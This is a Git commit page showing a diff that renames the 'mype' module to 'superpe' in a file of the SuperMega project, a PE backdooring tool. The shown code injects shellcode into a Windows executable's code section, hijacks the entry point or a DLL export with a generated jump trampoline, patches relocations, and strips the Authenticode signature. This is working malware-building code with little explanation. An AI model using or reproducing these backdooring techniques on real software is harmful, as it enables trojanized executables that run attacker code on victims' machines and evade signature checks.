admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-02 17:27:10 +00:00
Code Issues Packages Projects Releases Wiki Activity

refactor: mype -> superpe

Browse Source
This commit is contained in:
Dobin
2024-03-01 20:46:52 +00:00
parent 098577d2e5
commit f74bd574b4
6 changed files with 250 additions and 277 deletions
Download Patch File Download Diff File Expand all files Collapse all files
pe/derbackdoorer.py
+35 -35
View File
@@ -12,15 +12,15 @@ from enum import IntEnum
import logging
from helper import hexdump
from pe.mype import MyPe
from pe.superpe import SuperPe
from model.defs import *
logger = logging.getLogger("DerBackdoorer")
class PeBackdoor:
def __init__(self, mype: MyPe, main_shc: bytes, inject_mode: InjectStyle):
self.mype: MyPe = mype
def __init__(self, superpe: SuperPe, main_shc: bytes, inject_mode: InjectStyle):
self.superpe: SuperPe = superpe
self.runMode: InjectStyle = inject_mode
self.shellcodeData: bytes = main_shc
@@ -31,7 +31,7 @@ class PeBackdoor:
def injectShellcode(self):
sect = self.mype.get_code_section()
sect = self.superpe.get_code_section()
if sect == None:
logger.error('Could not find code section in input PE file!')
return False
@@ -48,22 +48,22 @@ Code section size : {sect_size}
offset = int((sect_size - len(self.shellcodeData)) / 2)
logger.debug(f'Inserting shellcode into 0x{offset:x} offset.')
self.mype.pe.set_bytes_at_offset(offset, self.shellcodeData)
self.superpe.pe.set_bytes_at_offset(offset, self.shellcodeData)
self.shellcodeOffset = offset
self.shellcodeOffsetRel = offset - sect.PointerToRawData
rva = self.mype.pe.get_rva_from_offset(offset)
rva = self.superpe.pe.get_rva_from_offset(offset)
p = sect.PointerToRawData + sect.SizeOfRawData - 64
graph = textwrap.indent(f'''
Beginning of {sect_name}:
{textwrap.indent(hexdump(self.mype.pe.get_data(sect.VirtualAddress), sect.VirtualAddress, 64), "0")}
{textwrap.indent(hexdump(self.superpe.pe.get_data(sect.VirtualAddress), sect.VirtualAddress, 64), "0")}
Injected shellcode in the middle of {sect_name}:
{hexdump(self.shellcodeData, offset, 64)}
Trailing {sect_name} bytes:
{hexdump(self.mype.pe.get_data(self.mype.pe.get_rva_from_offset(p)), p, 64)}
{hexdump(self.superpe.pe.get_data(self.superpe.pe.get_rva_from_offset(p)), p, 64)}
''', '\t')
logger.info(f'Shellcode injected into existing code section at RVA 0x{rva:x}')
@@ -73,8 +73,8 @@ Trailing {sect_name} bytes:
def setupShellcodeEntryPoint(self):
if self.runMode == InjectStyle.ChangeEntryPoint:
rva = self.mype.pe.get_rva_from_offset(self.shellcodeOffset)
self.mype.set_entrypoint(rva)
rva = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset)
self.superpe.set_entrypoint(rva)
logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}')
return True
@@ -101,19 +101,19 @@ Trailing {sect_name} bytes:
logger.critical('Export name not specified! Specify DLL Exported function name to hijack with -e/--export')
d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
self.mype.pe.parse_data_directories(directories=d)
self.superpe.pe.parse_data_directories(directories=d)
if self.mype.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0:
if self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0:
logger.error('No DLL exports found! Specify existing DLL Exported function with -e/--export!')
return -1
exports = [(e.ordinal, dec(e.name)) for e in self.mype.pe.DIRECTORY_ENTRY_EXPORT.symbols]
exports = [(e.ordinal, dec(e.name)) for e in self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols]
for export in exports:
logger.debug(f'DLL Export: {export[0]} {export[1]}')
if export[1].lower() == exportName.lower():
addr = self.mype.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address
addr = self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address
logger.info(f'Found DLL Export "{exportName}" at RVA 0x{addr:x} . Attempting to hijack it...')
return addr
@@ -121,13 +121,13 @@ Trailing {sect_name} bytes:
def backdoorEntryPoint(self, addr = -1):
imageBase = self.mype.pe.OPTIONAL_HEADER.ImageBase
self.shellcodeAddr = self.mype.pe.get_rva_from_offset(self.shellcodeOffset) + imageBase
imageBase = self.superpe.pe.OPTIONAL_HEADER.ImageBase
self.shellcodeAddr = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset) + imageBase
cs = None
ks = None
if self.mype.arch == 'x86':
if self.superpe.arch == 'x86':
cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32 + capstone.CS_MODE_LITTLE_ENDIAN)
ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_32 + keystone.KS_MODE_LITTLE_ENDIAN)
else:
@@ -139,33 +139,33 @@ Trailing {sect_name} bytes:
ep = addr
if addr == -1:
ep = self.mype.pe.OPTIONAL_HEADER.AddressOfEntryPoint
ep = self.superpe.pe.OPTIONAL_HEADER.AddressOfEntryPoint
ep_ava = ep + self.mype.pe.OPTIONAL_HEADER.ImageBase
data = self.mype.pe.get_memory_mapped_image()[ep:ep+128]
ep_ava = ep + self.superpe.pe.OPTIONAL_HEADER.ImageBase
data = self.superpe.pe.get_memory_mapped_image()[ep:ep+128]
offset = 0
logger.debug('Entry Point disasm:')
disasmData = self.mype.pe.get_memory_mapped_image()
output = self.mype.disasmBytes(cs, ks, disasmData, ep, 128, self.backdoorInstruction)
disasmData = self.superpe.pe.get_memory_mapped_image()
output = self.superpe.disasmBytes(cs, ks, disasmData, ep, 128, self.backdoorInstruction)
# store offset... by calculating it first FUCK
section = self.mype.get_code_section()
section = self.superpe.get_code_section()
self.backdoorOffsetRel = output - section.VirtualAddress
if output != 0:
logger.debug('Now disasm looks like follows: ')
disasmData = self.mype.pe.get_memory_mapped_image()
self.mype.disasmBytes(cs, ks, disasmData, output - 32, 32, None, maxDepth = 3)
disasmData = self.superpe.pe.get_memory_mapped_image()
self.superpe.disasmBytes(cs, ks, disasmData, output - 32, 32, None, maxDepth = 3)
logger.debug('\n[>] Inserted backdoor code: ')
for instr in cs.disasm(bytes(self.compiledTrampoline), output):
self.mype.printInstr(instr, 1)
self.superpe.printInstr(instr, 1)
logger.debug('')
self.mype.disasmBytes(cs, ks, disasmData, output + len(self.compiledTrampoline), 32, None, maxDepth = 3)
self.superpe.disasmBytes(cs, ks, disasmData, output + len(self.compiledTrampoline), 32, None, maxDepth = 3)
else:
logger.error('Did not find suitable candidate for Entry Point branch hijack!')
@@ -179,7 +179,7 @@ Trailing {sect_name} bytes:
registers = ['rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi']
if self.mype.arch == 'x86':
if self.superpe.arch == 'x86':
registers = ['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi']
reg = random.choice(registers).upper()
@@ -232,14 +232,14 @@ Trailing {sect_name} bytes:
if len(trampoline) > 0:
encoding, count = ks.asm(trampoline)
self.mype.pe.set_bytes_at_rva(instr.address, bytes(encoding))
self.superpe.pe.set_bytes_at_rva(instr.address, bytes(encoding))
relocs = (
instr.address + addrOffset,
)
pageRva = 4096 * int((instr.address + addrOffset) / 4096)
self.mype.addImageBaseRelocations(pageRva, relocs)
self.superpe.addImageBaseRelocations(pageRva, relocs)
self.trampoline = trampoline
self.compiledTrampoline = encoding
@@ -252,13 +252,13 @@ Trailing {sect_name} bytes:
def removeSignature(self):
addr = self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress
size = self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size
addr = self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress
size = self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size
self.mype.pe.set_bytes_at_rva(addr, b'\x00' * size)
self.superpe.pe.set_bytes_at_rva(addr, b'\x00' * size)
self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0
self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size = 0
self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0
self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size = 0
logger.info('PE executable Authenticode signature removed.')
return True